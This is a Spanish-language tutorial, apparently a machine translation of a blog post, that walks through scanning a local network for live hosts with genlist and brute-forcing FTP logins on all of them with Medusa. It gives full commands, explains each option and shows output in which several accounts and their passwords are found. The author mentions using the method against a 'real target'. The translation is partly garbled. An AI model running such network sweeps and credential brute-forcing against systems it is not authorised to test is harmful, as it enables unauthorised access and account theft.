Esta guía le mostrará cómo realizar un ftp simple o cualquier otro servicio que es compatible con Medusa para comprobar la debilidad de los datos de acceso
Voy a estar utilizando genlist para recopilar una lista de los ejércitos en vivo que se están ejecutando en la red y han resultado en un archivo txt que Medusa puede utilizar para realizar un ataque de fuerza bruta sobre todas las huestes vivir
voy a empezar con la ruta para encontrar el rango de la red está utilizando
syskc0@bt:~# route -n |grep eth1
192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1
0.0.0.0 192.168.1.254 0.0.0.0 UG 0 0 0 eth1
syskc0@bt:~#
En el ejemplo anterior en la red que estoy conectado a está utilizando el rango de ip 192.168.1.0 y la
puerta de enlace predeterminada 192.168.1.254, así que analizará toda la máscara de red para los hosts de vivir con genlist
syskc0@bt:~# genlist -s 192.168.1.\* > host_c-intruder3s
syskc0@bt:~# cat host_c-intruder3s
192.168.1.67
192.168.1.68
192.168.1.69
192.168.1.77
192.168.1.78
192.168.1.101
192.168.1.254
syskc0@bt:~#
Ahora he obtenido una lista de anfitriones en vivo puedo ir para usar Medusa
medusa -v 6 -H host_c-intruder3s -U username.txt -P pwords.txt -M ftp
Medusa Opciones
-v nivel de detalle seis
H-Lista de Clientes
-U lista Nombre de usuario
-P lista Contraseña
-M FTP tipo de módulo, TELNET, SSH, HTTP, etc
Nota Para este tutorial sólo voy a utilizar una pequeña de usuario / contraseña Lista Para ahorrar tiempo
Mi salida
syskc0@bt:~# medusa -v 6 -H host_c-intruder3s -U username.txt -P pwords.txt -M ftp |grep "ACCOUNT FOUND"
NOTICE: [ftp.mod] Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: [ftp.mod] Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: [ftp.mod] Socket is no longer valid. Server likely dropped connection. Establishing new session.
ACCOUNT FOUND: [ftp] Host: 192.168.1.67 User: zerocold Password: password123 [SUCCESS]
ACCOUNT FOUND: [ftp] Host: 192.168.1.67 User: offsec Password: password [SUCCESS]
NOTICE: [ftp.mod] Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: [ftp.mod] Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: [ftp.mod] Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: [ftp.mod] Socket is no longer valid. Server likely dropped connection. Establishing new session.
ACCOUNT FOUND: [ftp] Host: 192.168.1.68 User: michael Password:jhonadmin [SUCCESS]
ACCOUNT FOUND: [ftp] Host: 192.168.1.77 User: rafael Password: admin123 [SUCCESS]
syskc0@bt:~#
En el ejemplo anterior he utilizado | grep "cuenta que se encuentra" para cortar la mayor parte de la salida, así que sólo reciben los nombres de usuario y contraseñas, pero si yo fuera a hacer esto en el objetivo real no es mi i red doméstica que se ejecuta de forma normal para puedo ver hasta qué punto el ataque está en marcha
original source http://zerocold.co.uk/?p=649
Ahi acomode la fuente Zero!
Gran trabajo y buen post!